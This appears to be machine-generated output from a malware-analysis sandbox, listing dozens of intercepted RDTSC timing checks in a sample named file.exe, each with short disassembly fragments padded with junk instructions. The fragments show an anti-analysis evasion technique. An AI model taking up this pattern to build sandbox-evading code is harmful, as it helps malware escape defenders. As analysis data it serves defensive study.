              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14263FE second address: 142641A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F76D881F85Eh 0x0000000c ja 00007F76D881F862h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142641A second address: 1426420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14265DE second address: 14265E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14266E3 second address: 14266E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14266E7 second address: 14266EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142688B second address: 14268A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D570ECh 0x00000007 jp 00007F76D8D570E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14268A1 second address: 14268A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14268A6 second address: 14268BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D570EAh 0x00000009 jno 00007F76D8D570E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426A31 second address: 1426A37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426E46 second address: 1426E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F76D8D570E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d jc 00007F76D8D57101h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426F88 second address: 1426F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426F91 second address: 1426F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426F95 second address: 1426FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F72h 0x00000007 jnc 00007F76D8527F66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F76D8527F77h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426FCC second address: 1426FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426FD0 second address: 1426FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F76D8527F73h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f jnp 00007F76D8527F6Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431773 second address: 143177D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76D8D570E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143177D second address: 143178A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F76D8527F66h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14318F3 second address: 14318FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1438F13 second address: 1438F28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007F76D8527F66h 0x0000000b jne 00007F76D8527F66h 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14377BD second address: 14377EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F76D8D570E6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push edi 0x0000000d jmp 00007F76D8D570F7h 0x00000012 pushad 0x00000013 jl 00007F76D8D570E6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437BB1 second address: 1437BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437BB5 second address: 1437BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437D32 second address: 1437DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F79h 0x00000007 push ecx 0x00000008 jmp 00007F76D8527F70h 0x0000000d jmp 00007F76D8527F75h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F76D8527F77h 0x0000001c push edi 0x0000001d jmp 00007F76D8527F77h 0x00000022 jp 00007F76D8527F66h 0x00000028 pop edi 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437DAE second address: 1437DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D8D570ECh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437DBE second address: 1437DCE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F76D8527F66h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1438C16 second address: 1438C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1438C1C second address: 1438C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4C7 second address: 143C4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4CD second address: 143C4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4D6 second address: 143C4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4DA second address: 143C4E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4E8 second address: 143C4FF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F76D8D570F2h 0x00000008 jc 00007F76D8D570E6h 0x0000000e je 00007F76D8D570E6h 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4FF second address: 143C515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007F76D8527F68h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C515 second address: 143C51B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143FCA2 second address: 143FCA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143FCA8 second address: 143FCB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143FCB2 second address: 143FCBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143F490 second address: 143F4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edi 0x00000008 jng 00007F76D8D570E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143F5F0 second address: 143F628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8527F76h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F76D8527F7Ah 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143F628 second address: 143F632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F76D8D570E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143F632 second address: 143F65F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F77h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F76D8527F6Eh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447C3B second address: 1447C4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D570ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447C4B second address: 1447C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447C51 second address: 1447C56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445DB8 second address: 1445DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445DBE second address: 1445DDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F76D8D570F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446A89 second address: 1446A91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446A91 second address: 1446AC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push edi 0x00000007 jmp 00007F76D8D570F4h 0x0000000c jmp 00007F76D8D570EAh 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jnc 00007F76D8D570E6h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446AC5 second address: 1446AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F76D8527F71h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446AE2 second address: 1446AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446AE6 second address: 1446AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8527F73h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446DBC second address: 1446DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14476A7 second address: 14476AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144791F second address: 144793A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F76D8D570E6h 0x0000000a jmp 00007F76D8D570EBh 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144793A second address: 1447985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F76D8527F6Eh 0x0000000d jmp 00007F76D8527F78h 0x00000012 pop edx 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F76D8527F6Ch 0x0000001a js 00007F76D8527F72h 0x00000020 js 00007F76D8527F66h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144929D second address: 14492A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14492A1 second address: 14492A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14492A7 second address: 14492BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76D8D570EEh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14492BB second address: 14492CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F76D8527F66h 0x0000000a jnl 00007F76D8527F66h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14507D7 second address: 1450812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D570F7h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c jnl 00007F76D8D570F9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1450812 second address: 145083A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F6Bh 0x00000007 jng 00007F76D8527F66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F76D8527F6Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145083A second address: 145083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1450D8B second address: 1450D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1450D8F second address: 1450DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D570F7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1450F01 second address: 1450F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1450F07 second address: 1450F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145104A second address: 145104E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145104E second address: 1451069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F76D8D570E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F76D8D570EFh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451069 second address: 1451089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F76D8527F66h 0x0000000a jmp 00007F76D8527F76h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451339 second address: 145135B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76D8D570F2h 0x00000008 pushad 0x00000009 jmp 00007F76D8D570EBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458A6A second address: 1458A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458A6E second address: 1458A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F76D8D570E6h 0x0000000f je 00007F76D8D570E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458A85 second address: 1458A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8527F6Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F76D8527F66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458A9E second address: 1458AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458EA9 second address: 1458EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14592C1 second address: 14592C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14592C5 second address: 1459303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F76D8527F66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F76D8527F6Ah 0x00000012 jmp 00007F76D8527F77h 0x00000017 jmp 00007F76D8527F6Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145959B second address: 145959F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459E64 second address: 1459E6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A581 second address: 145A594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A594 second address: 145A598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A598 second address: 145A5A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D570ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146004A second address: 146006F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F76D8527F66h 0x00000008 jmp 00007F76D8527F78h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146006F second address: 146007E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F76D8D570E6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146007E second address: 146008A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146008A second address: 1460096 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1460096 second address: 146009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146009C second address: 14600AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jbe 00007F76D8D570E6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14600AD second address: 14600B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14600B1 second address: 14600B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14623E5 second address: 14623E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146FEAD second address: 146FEB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146FEB1 second address: 146FEC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F73h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146FEC8 second address: 146FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146FECE second address: 146FEF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76D8527F77h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14715FB second address: 1471601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471601 second address: 1471628 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F76D8527F66h 0x00000008 jmp 00007F76D8527F75h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F76D8527F66h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14735B3 second address: 14735B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14735B9 second address: 14735E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F76D8527F6Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F76D8527F6Ch 0x00000015 jns 00007F76D8527F66h 0x0000001b push ebx 0x0000001c jc 00007F76D8527F66h 0x00000022 jns 00007F76D8527F66h 0x00000028 pop ebx 0x00000029 rdtsc
